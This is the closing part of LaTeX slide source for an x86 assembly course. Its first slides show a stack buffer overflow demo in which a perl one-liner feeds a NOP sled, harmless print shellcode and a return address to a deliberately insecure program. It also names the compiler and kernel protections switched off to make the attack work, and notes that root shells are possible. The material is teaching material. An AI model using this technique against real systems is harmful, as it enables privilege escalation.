Illegal instruction
\end{textcode*}
\pause
\begin{textcode*}{fontsize=\fontsize{8}{8}}
$ perl -e 'print "\x90" x 20 . "\xeb\x14\x59\x31\xc0\x31\xdb\x31\xd2\x43
\x04\x04\x80\xc2\x06\xcd\x80\x31\xc0\x40\xcd\x80\xe8\xe7\xff\xff\xff
\x48\x65\x6c\x6c\x6f\x21" . "A" x 59 . "\x60\xf2\xff\xbf"' | ./example-insecure
input:
Hello!$
\end{textcode*}
\end{frame}
\begin{frame}[fragile,t]
\frametitle{Closing Notes}
\begin{itemize}
\item If vulnerable program was running as root, shellcode can spawn a root shell
\item If vulnerable program was suid root, shellcode can {\ttfamily setuid(0)} and then spawn a root shell
\pause
\item We had to disable three security mechanisms to allow the traditional stack-based buffer overflow to work.
\begin{itemize}
\item GCC Stack Protector \\ (disabled with {\small \ttfamily -fno-stack-protector} gcc option)
\item Non-Executable Stack \\ (disabled with {\small \ttfamily -z execstack} gcc option)
\item Address Space Layout Randomization \\ (disabled by writing 0 to {\small \ttfamily /proc/sys/kernel/randomize\_va\_space})
\end{itemize}
\end{itemize}
\end{frame}
\begin{frame}[fragile,t]
\frametitle{Security Mechanisms to Prevent Stack-based Buffer Overflows}
\begin{itemize}
\item GCC Stack Protector
\begin{itemize}
\item GCC generates code to install a random guard value on the stack, below the saved frame pointer, and checks for its validity before the function returns
\item If the guard value is corrupted by a buffer overflow, the pre-return check will catch it
\end{itemize}
\pause
\item Non-Executable Stack
\begin{itemize}
\item NX page table entry bit introduced in x86-64 processors. The Linux kernel uses it to mark the stack non-executable, so shellcode cannot execute from the stack
\end{itemize}
\pause
\item Address Space Layout Randomization
\begin{itemize}
\item User program address space is randomized to make it difficult to guess shared library function locations or stack variable locations
\item Increases difficulty of finding a suitable return address
\end{itemize}
\end{itemize}
\end{frame}
\section{Extra Topic 1: Intel/nasm Syntax}
\begin{frame}[fragile,t]
\frametitle{Differences}
\begin{itemize}
\item Intel Syntax: {\ttfamily <mnemonic> <dest>, <src>}
\item Directives are not preceded by a dot {\ttfamily .}
\item Fewer prefixes/suffixes floating around, so source looks cleaner
\pause
\item Memory addresses are just plain symbol names
\item Memory dereferenced with brackets {\ttfamily [ ... ]}
\pause
\item Instruction size usually implied by registers used, but is made explicit when necessary with {\ttfamily byte, word, dword} keywords
\begin{itemize}
\item {\ttfamily mov [ebp-4], dword 42}
\end{itemize}
\vs
\pause
\item Indirect memory accesses spelled out as expressions
\begin{itemize}
\item AT\&T / GAS: {\ttfamily movl \%eax, -12(\%ebp, \%ecx, 4)}
\item Intel / NASM: {\ttfamily mov [ebp+ecx*4-12], eax}
\end{itemize}
\end{itemize}
\end{frame}
\begin{frame}[fragile,t]
\frametitle{Side-by-side Hello World Syscall Example (example-hello-nasm.asm)}
\mvs \mvs
\begin{columns}[T]
\column{0.5\textwidth}
\begin{gascode*}{frame=single}
.section .text
.global _start
_start:
# open("foo", ...);
movl $0x05, %eax
movl $filename, %ebx
movl $0x41, %ecx
movl $0644, %edx
int $0x80
# fd in %eax -> %ebx
movl %eax, %ebx
# write(fd, ...);
movl $0x04, %eax
# fd in %ebx from above
movl $message, %ecx
movl $messageLen, %edx
int $0x80
# close(fd);
movl $0x06, %eax
# fd still in %ebx
int $0x80
\end{gascode*}
\column{0.5\textwidth}
\begin{nasmcode*}{frame=single}
section .text
global _start
_start:
; open("foo", ...);
mov eax, 5
mov ebx, filename
mov ecx, 0x41
mov edx, 0q644
int 0x80
; fd in eax -> ebx
mov ebx, eax
; write(fd, ...);
mov eax, 4
; fd in ebx from above
mov ecx, message
mov edx, messageLen
int 0x80
; close(fd);
mov eax, 6
; fd still in ebx
int 0x80
\end{nasmcode*}
\end{columns}
\end{frame}
\begin{frame}[fragile,t]
\frametitle{Side-by-side Hello World Syscall Example (example-hello-nasm.asm) Continued}
\mvs
\begin{columns}[T]
\column{0.5\textwidth}
\begin{gascode*}{frame=single}
# exit(0);
movl $0x01, %eax
movl $0x0, %ebx
int $0x80
.section .data
filename: .ascii "foo\0"
message: .ascii "Hello World!\n"
.equ messageLen, . - message
\end{gascode*}
\column{0.5\textwidth}
\begin{nasmcode*}{frame=single}
; exit(0);
mov eax, 1
mov ebx, 0
int 0x80
section .data
filename: db 'foo',0
message: db 'Hello World!',10
messageLen: equ $ - message
\end{nasmcode*}
\end{columns}
\vs
{\footnotesize Runtime:}
\begin{textcode}
$ nasm -f elf example-hello-nasm.asm -o example-hello-nasm.o
$ ld example-hello-nasm.o -o example-hello-nasm
$ ./example-hello-nasm
$ cat foo
Hello World!
$
\end{textcode}
\end{frame}
\section{Extra Topic 2: x86-64 Assembly}
\begin{frame}[fragile,t]
\frametitle{Immediate Differences}
\begin{itemize}
\item {\ttfamily \%eax} extended to 64-bit {\ttfamily \%rax}, along with \\
{\ttfamily \%rbx, \%rcx, \%rdx, \%rbp, \%rsp, \%rsi, \%rdi}
\item Supplemental general purpose registers \\
{\ttfamily \%r8, \%r9, \%r10, \%r11, \%r12, \%r13, \%r14, \%r15}
\vs \vs
\item Good architectural changes
\begin{itemize}
\item Segmentation and hardware task switching wiped away
\item No-Execute bit in page table entries to enforce non-executable sections
\end{itemize}
\vs
\item A lot of q's instead of l's: {\ttfamily movq, pushq, addq}
\item Stack pushes and pops are all typically 8-byte / 64-bit values
\item {\small \url{http://en.wikipedia.org/wiki/X86-64#Architectural\_features}}
\end{itemize}
\end{frame}
\begin{frame}[fragile,t]
\frametitle{Different Calling Convention}
\begin{itemize}
\item System V ABI
\item \url{http://www.x86-64.org/documentation/abi.pdf}
\item Function Call Convention (Linux)
\begin{itemize}
\item Arguments passed in registers: {\ttfamily \%rdi, \%rsi, \%rdx, \%rcx, \%r8, \%r9}
\item Extra arguments pushed onto the stack
\item Function must preserve {\ttfamily \%rbp, \%rbx, \%r12 - \%r15}
\item Function can use rest of registers
\item Return value in {\ttfamily \%rax}
\end{itemize}
\item System Call Convention (Linux)
\begin{itemize}
\item Syscall number in {\ttfamily \%rax}
\item Arguments passed in registers: {\ttfamily \%rdi, \%rsi, \%rdx, \%r10, \%r8, \%r9}
\item Use {\ttfamily syscall} instruction
\item {\ttfamily \%rcx} and {\ttfamily \%r11} destroyed
\item Return value in {\ttfamily \%rax}
\end{itemize}
\end{itemize}
\end{frame}
\section{Resources and Next Steps}
\begin{frame}[fragile,t]
\frametitle{Essential Links}
\begin{itemize}
\item x86-32 + x86-64 instruction set: \\ \url{http://ref.x86asm.net/}
\item Official x86-32 + x86-64 architecture info: \\ \url{http://www.intel.com/content/www/us/en/processors/architectures-software-developer-manuals.html}
\item Unofficial x86-32 + x86-64 architecture info: \\ \url{http://sandpile.org/}
\item Linux System Call Reference: \\ \url{http://syscalls.kernelgrok.com/}
\item Assembly Optimization Tips: \\ \url{http://www.mark.masmcode.com/}
\item Interesting ``assembly gems'': \\ \url{http://www.df.lth.se/~john\_e/fr\_gems.html}
\end{itemize}
\end{frame}
\begin{frame}[fragile,t]
\frametitle{Going From Here}
\vspace{-0.5em}
\begin{itemize}
\item Play with the examples
\begin{itemize}
\item Modify Morse Encoder example to handle words ({\ttfamily morse.S})
\item Add find and remove to Linked List example ({\ttfamily linked\_list.S})
\item Modify Fibonacci to print with syscalls instead of {\ttfamily printf()}, ({\ttfamily fibonacci.S})
\item Write a recursive Fibonacci Sequence generator
\item Modify exploit shellcode to print a newline ({\ttfamily example-shellcode2.S})
\end{itemize}
\item Write your own syscall, e.g. rot13
\item Do Stack Smashing challenges: \\ {\footnotesize \url{http://community.corest.com/~gera/InsecureProgramming/}}
\item Rewrite a traditional *nix program in Assembly
\begin{itemize}
\item e.g. telnet: \\ {\footnotesize \url{https://github.com/vsergeev/x86asm/blob/master/telnet.asm}}
\item e.g. asmscan: \\ {\footnotesize\url{https://github.com/edma2/asmscan}}
\end{itemize}
\item Write assembly for microcontrollers like Atmel AVR, Microchip PIC, and ARM Cortex M series
\end{itemize}
\end{frame}
\section*{Lingering Questions?}
\end{document}